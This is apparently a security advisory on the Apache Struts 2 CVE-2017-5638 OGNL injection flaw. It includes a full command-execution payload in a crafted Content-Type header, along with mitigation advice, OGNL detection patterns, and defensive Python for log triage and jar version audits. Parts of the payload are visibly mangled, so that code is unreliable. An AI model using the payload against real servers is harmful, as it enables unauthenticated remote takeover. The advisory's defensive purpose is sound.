How the Mentioned CVE Works:
CVE-2017-5638 is a critical vulnerability in Apache Struts 2, a popular framework for building Java web applications. The flaw is in the Jakarta Multipart parser, which handles file uploads. An attacker triggers it by sending an HTTP request with a crafted Content-Type header. The server does not properly validate this header value, and processing it lets the attacker execute arbitrary code on the server. The vulnerability is particularly dangerous because it is exploitable remotely without authentication, which makes it a prime target for attackers aiming to compromise web applications.
The root cause is improper handling of exception messages during file uploads. When the parser rejects a malformed Content-Type header, the resulting error message contains the attacker-supplied header value and is evaluated as an Object-Graph Navigation Language (OGNL) expression, so the header can be crafted to execute commands. This vulnerability affects Apache Struts versions 2.3.5 through 2.3.31 and 2.5 through 2.5.10. Organizations running these versions are urged to update to the patched releases to mitigate the risk.
DailyCVE Form:
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: March 7, 2017
What Undercode Say:
Exploitation:
- Craft an HTTP request with a malicious Content-Type header containing OGNL expressions.
- Send the request to the target server running a vulnerable version of Apache Struts.
- The server evaluates the OGNL expression, allowing arbitrary code execution.
Example Exploit Code:
POST /example/upload.action HTTP/1.1
Host: target.com
Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[bash]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}
Protection:
- Update Apache Struts to version 2.3.32 or 2.5.10.1 or later.
- Implement input validation to sanitize user-supplied data.
- Use a Web Application Firewall (WAF) to filter malicious requests.
- Disable the Jakarta Multipart parser if not required.
Example Mitigation Code:
<constant name="struts.custom.i18n.resources" value="global" />
<constant name="struts.multipart.parser" value="jakarta-stream" />
Analytics:
- Affected Systems: Web applications using Apache Struts 2.3.5 – 2.3.31 or 2.5 – 2.5.10.
- Attack Vector: Remote, unauthenticated.
- Impact: Full server compromise, data theft, and potential lateral movement.
- Detection: Monitor logs for unusual Content-Type headers or OGNL expressions.
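The "Implement input validation" step under Protection and the "Monitor logs for unusual Content-Type headers or OGNL expressions" item under Detection are the same check applied at two points: reject the header at request time, and flag it when reviewing logs. The following script is an added example (not code from this page, from Undercode, or from Apache Struts). It assumes an allow-list of the Content-Type shapes the application expects and a log format in which the request's Content-Type was recorded as a trailing ct="..." field; real access logs do not include that header unless the log format is configured to write it. The sample log lines are constructed.

```python
"""Content-Type validation and log triage for CVE-2017-5638 style requests.

Added example, not code from the DailyCVE page or from Apache Struts.
The allow-list regex and the log format with a trailing ct="..." field are
assumptions for this example; a real deployment must log the Content-Type
header explicitly (e.g. via the access log format) for the scan to work.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Substrings that never belong in a legitimate Content-Type header; their presence
# is a strong signal of an OGNL injection attempt (a detection signal, not a proof).
OGNL_MARKERS = ("%{", "${", "@ognl", "_memberAccess", "ProcessBuilder", "getRuntime")

# Allow-list of Content-Type shapes the upload endpoint expects. The multipart
# boundary is restricted to the RFC 2046 bchars set, so expression syntax
# such as '{', '}', '$' or '%' cannot pass even when no marker substring matches.
SAFE_CONTENT_TYPE = re.compile(
    r"^(?:"
    r"multipart/form-data;\s*boundary=[A-Za-z0-9'()+_,\-./:=? ]{1,70}"
    r"|application/x-www-form-urlencoded"
    r"|application/json"
    r"|text/plain"
    r")(?:;\s*charset=[A-Za-z0-9._-]+)?$",
    re.IGNORECASE,
)


def is_safe_content_type(value: str | None) -> bool:
    """Fail closed: an absent header is fine, anything outside the allow-list is not."""
    if not value:
        return True
    return SAFE_CONTENT_TYPE.match(value) is not None


def ognl_markers_in(value: str) -> list[str]:
    """Return the OGNL marker substrings found in the header value (case-insensitive)."""
    lowered = value.lower()
    return [m for m in OGNL_MARKERS if m.lower() in lowered]


@dataclass
class Finding:
    line_no: int
    client: str
    path: str
    content_type: str
    markers: list[str]


# Combined log format plus a constructed ct="..." field holding the request's Content-Type.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ ct="(?P<ct>[^"]*)"$'
)


def scan_log(text: str) -> list[Finding]:
    """Flag every request whose Content-Type carries OGNL markers or fails the allow-list."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ct = m.group("ct")
        markers = ognl_markers_in(ct)
        if markers or not is_safe_content_type(ct):
            findings.append(Finding(n, m.group("ip"), m.group("path"), ct, markers))
    return findings


# Constructed sample log lines (not real traffic). Lines 2 and 5 should be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Mar/2017:10:01:02 +0000] "POST /example/upload.action HTTP/1.1" 200 512 ct="multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"
203.0.113.9 - - [07/Mar/2017:10:01:05 +0000] "POST /example/upload.action HTTP/1.1" 200 1024 ct="%{(#_='multipart/form-data').(#x=1)}"
198.51.100.4 - - [07/Mar/2017:10:02:11 +0000] "GET /example/index.action HTTP/1.1" 200 2048 ct=""
198.51.100.5 - - [07/Mar/2017:10:03:40 +0000] "POST /example/login.action HTTP/1.1" 302 0 ct="application/x-www-form-urlencoded"
203.0.113.9 - - [07/Mar/2017:10:04:00 +0000] "POST /example/upload.action HTTP/1.1" 200 900 ct="multipart/form-data; boundary=${x}"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client} {f.path} markers={f.markers} ct={f.content_type!r}")
```

The allow-list is the part that matters for prevention: a marker list catches the payload shape shown on this page, but the fifth sample line shows why the structural check is needed as well, since expression syntax can be hidden inside a boundary parameter. Running the same two checks in a request filter (before the multipart parser sees the header) is what turns the detection rule into a mitigation.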
Commands:
- Check Apache Struts version (the struts2-core jar name carries the version; the Maven pom.properties inside the jar confirms it):
ls /path/to/webapp/WEB-INF/lib/struts2-core-*.jar
unzip -p /path/to/webapp/WEB-INF/lib/struts2-core-*.jar META-INF/maven/org.apache.struts/struts2-core/pom.properties | grep -i "^version="
- Patch update: the Struts downloads page lists the patched releases (2.3.32, 2.5.10.1 or later); fetch the release archive linked there and replace the Struts jars under WEB-INF/lib with the patched ones:
wget https://struts.apache.org/downloads.html
- Restart the servlet container hosting the application after patching (Tomcat shown; the service name depends on the deployment):
sudo systemctl restart tomcat
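Checking one jar by hand is fine for a single server; across many deployments the version check above is better done by a script that reads the version from each struts2-core jar and compares it against the affected ranges stated on this page. The following is an added example (not code from this page, from Undercode, or from the Struts project). It assumes a Maven-built jar containing META-INF/maven/org.apache.struts/struts2-core/pom.properties; the jars it audits when run directly are constructed stand-ins that carry only that properties file.

```python
"""Audit WEB-INF/lib for struts2-core jars in the CVE-2017-5638 affected ranges.

Added example, not code from the DailyCVE page or from Apache Struts. Assumes a
Maven-built jar carrying META-INF/maven/org.apache.struts/struts2-core/pom.properties;
jars built another way would need a different version source.
"""
from __future__ import annotations

import tempfile
import zipfile
from pathlib import Path

# Affected ranges as stated in the advisory; fixed in 2.3.32 and 2.5.10.1.
AFFECTED_RANGES = (("2.3.5", "2.3.31"), ("2.5", "2.5.10"))
POM_PROPERTIES = "META-INF/maven/org.apache.struts/struts2-core/pom.properties"


def parse_version(v: str) -> tuple[int, ...]:
    """'2.5.10.1' -> (2, 5, 10, 1); a qualifier such as '-SNAPSHOT' is dropped."""
    core = v.split("-")[0]
    return tuple(int(p) for p in core.split(".") if p.isdigit())


def is_affected(version: str) -> bool:
    """True when the version lies inside either affected range (inclusive).

    Tuple comparison handles the open-ended lower bound '2.5': (2, 5) sorts
    before (2, 5, 0) and (2, 5, 10), while (2, 5, 10, 1) sorts after (2, 5, 10).
    """
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in AFFECTED_RANGES)


def version_from_jar(jar: Path | str) -> str | None:
    """Read the 'version=' entry from the jar's Maven pom.properties, or None if absent."""
    with zipfile.ZipFile(jar) as z:
        try:
            props = z.read(POM_PROPERTIES).decode("utf-8")
        except KeyError:
            return None
    for line in props.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "version":
            return value.strip()
    return None


def audit_lib_dir(lib_dir: Path | str) -> list[tuple[str, str | None, bool]]:
    """Return (jar name, version, affected) for every struts2-core jar in the directory."""
    results = []
    for jar in sorted(Path(lib_dir).glob("struts2-core-*.jar")):
        ver = version_from_jar(jar)
        results.append((jar.name, ver, ver is not None and is_affected(ver)))
    return results


def build_sample_jar(path: Path, version: str) -> None:
    """Constructed stand-in for a struts2-core jar: only the pom.properties entry matters here."""
    with zipfile.ZipFile(path, "w") as z:
        z.writestr(POM_PROPERTIES, f"version={version}\ngroupId=org.apache.struts\nartifactId=struts2-core\n")


def demo_audit() -> list[tuple[str, str | None, bool]]:
    """Build two constructed jars in a temporary directory and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp)
        build_sample_jar(lib / "struts2-core-2.3.31.jar", "2.3.31")
        build_sample_jar(lib / "struts2-core-2.5.10.1.jar", "2.5.10.1")
        return audit_lib_dir(lib)


if __name__ == "__main__":
    # Point audit_lib_dir() at a real /path/to/webapp/WEB-INF/lib to audit a deployment.
    for name, ver, affected in demo_audit():
        print(f"{name}: version={ver} affected={affected}")
```

A jar without pom.properties is reported with version None rather than treated as safe, so such entries should be checked by hand.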
By following these steps, organizations can effectively mitigate the risks associated with CVE-2017-5638 and protect their web applications from exploitation.
References:
CVE record: https://www.cve.org/CVERecord?id=CVE-2017-5638